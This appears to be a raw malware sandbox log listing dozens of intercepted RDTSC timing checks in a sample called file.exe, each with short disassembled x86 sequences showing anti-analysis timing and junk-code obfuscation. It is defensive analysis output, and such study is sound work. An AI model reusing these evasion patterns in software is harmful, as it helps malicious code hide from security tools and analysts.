Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A3B6 second address: 31A3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A4F3 second address: 31A4F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A6EA second address: 31A6FC instructions: 0x00000000 rdtsc 0x00000002 je 00007FB6784C8BD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A6FC second address: 31A700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A700 second address: 31A709 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A709 second address: 31A70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31AE59 second address: 31AE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE7h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FB6784C8BE4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31AFA7 second address: 31AFBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB678E7E6F0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31B2AC second address: 31B2B6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB6784C8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31B2B6 second address: 31B2BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31B3F5 second address: 31B43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FB6784C8BDFh 0x0000000d jnp 00007FB6784C8BD6h 0x00000013 popad 0x00000014 jmp 00007FB6784C8BE7h 0x00000019 popad 0x0000001a nop 0x0000001b mov dword ptr [ebp+122D1DAAh], edx 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 je 00007FB6784C8BDCh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31B43C second address: 31B45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB678E7E6F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31B45C second address: 31B462 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31B462 second address: 31B47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB678E7E6F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31B47B second address: 31B47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31B8FF second address: 31B908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31D269 second address: 31D280 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB6784C8BDFh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31D280 second address: 31D284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31F27F second address: 31F285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31EFDF second address: 31EFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31F285 second address: 31F31D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB6784C8BE8h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FB6784C8BD8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c jbe 00007FB6784C8BDCh 0x00000032 or dword ptr [ebp+122D1DD0h], ecx 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+12462F88h], ebx 0x00000040 push 00000000h 0x00000042 or esi, dword ptr [ebp+1246D5FDh] 0x00000048 xchg eax, ebx 0x00000049 push ecx 0x0000004a jnc 00007FB6784C8BDCh 0x00000050 pop ecx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FB6784C8BE9h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 320A1C second address: 320A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 320A22 second address: 320A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 320A27 second address: 320A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB678E7E6F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 320A40 second address: 320A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 320A44 second address: 320A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB678E7E6EAh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FB678E7E6E8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d xchg eax, ebx 0x0000002e jmp 00007FB678E7E6F8h 0x00000033 push eax 0x00000034 pushad 0x00000035 push edi 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32371D second address: 323739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB6784C8BE3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3212E7 second address: 3212F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3212F0 second address: 3212F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 324C0F second address: 324C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 323F5E second address: 323F63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 324C13 second address: 324C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 323F63 second address: 323F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 324C19 second address: 324C2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FB678E7E6E8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 324C2C second address: 324C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB6784C8BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 324EBB second address: 324EC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 325D9C second address: 325DA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 326C84 second address: 326C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FB678E7E6E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 326C97 second address: 326CA1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB6784C8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 326CA1 second address: 326CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB678E7E6EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 327D64 second address: 327D8E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB6784C8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FB6784C8BD6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FB6784C8BE1h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 327D8E second address: 327E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FB678E7E6E8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007FB678E7E6EEh 0x00000027 mov edi, 56597CB8h 0x0000002c pop ebx 0x0000002d push 00000000h 0x0000002f mov ebx, dword ptr [ebp+122D1CE9h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007FB678E7E6E8h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 add dword ptr [ebp+122D393Ch], ecx 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FB678E7E6EBh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 327E08 second address: 327E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 326F0E second address: 326F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FB678E7E6E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 327E0E second address: 327E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 326F1B second address: 326F3D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB678E7E6E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FB678E7E6F2h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 327E12 second address: 327E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 328E14 second address: 328E1A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 327F88 second address: 327F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 327F8C second address: 327FA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 328090 second address: 3280A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007FB6784C8BE4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FB6784C8BD6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A149 second address: 32A14F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A14F second address: 32A155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32BD8E second address: 32BE04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB678E7E6E8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D3937h] 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D2824h], edi 0x00000032 jne 00007FB678E7E6ECh 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007FB678E7E6E8h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 or dword ptr [ebp+122D393Ch], edx 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push edi 0x0000005e push edx 0x0000005f pop edx 0x00000060 pop edi 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A155 second address: 32A172 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB6784C8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB6784C8BDEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32DF6E second address: 32DF78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB678E7E6E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32ED83 second address: 32ED8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 331CE7 second address: 331CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 331CED second address: 331D0D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB6784C8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FB6784C8BE1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32E16E second address: 32E19E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB678E7E6EBh 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007FB678E7E6F7h 0x00000019 jmp 00007FB678E7E6F1h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32E19E second address: 32E1AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6784C8BDAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32E1AC second address: 32E1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32BF55 second address: 32BFC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6784C8BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+122D2F4Fh] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, 056ABF00h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov dword ptr [ebp+122D1F05h], edx 0x00000029 mov eax, dword ptr [ebp+122D171Dh] 0x0000002f mov dword ptr [ebp+1245FF67h], eax 0x00000035 push FFFFFFFFh 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007FB6784C8BD8h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov dword ptr [ebp+124522DBh], esi 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32BFC8 second address: 32BFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 332F8C second address: 332F90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33520B second address: 335211 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33B8C3 second address: 33B8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6784C8BE0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 33D5FD second address: 33D603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3414B5 second address: 3414CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007FB6784C8BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007FB6784C8BD6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 341D28 second address: 341D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D7463 second address: 2D746F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FB6784C8BD6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34812E second address: 348134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348134 second address: 34813E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB6784C8BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348288 second address: 3482A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB678E7E6F6h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3482A4 second address: 3482AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348409 second address: 348413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB678E7E6E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348413 second address: 348417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348417 second address: 34841D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348554 second address: 348558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348558 second address: 34855C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34855C second address: 348562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348562 second address: 348568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348568 second address: 348572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB6784C8BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348572 second address: 348576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348576 second address: 348584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FB6784C8BE8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348811 second address: 348815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348815 second address: 348829 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FB6784C8BD6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348958 second address: 34895C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348C62 second address: 348C68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348C68 second address: 348C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 348C6E second address: 348C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FB6784C8BD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3512DA second address: 351313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB678E7E6F8h 0x00000009 jmp 00007FB678E7E6F4h 0x0000000e popad 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 351313 second address: 351317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
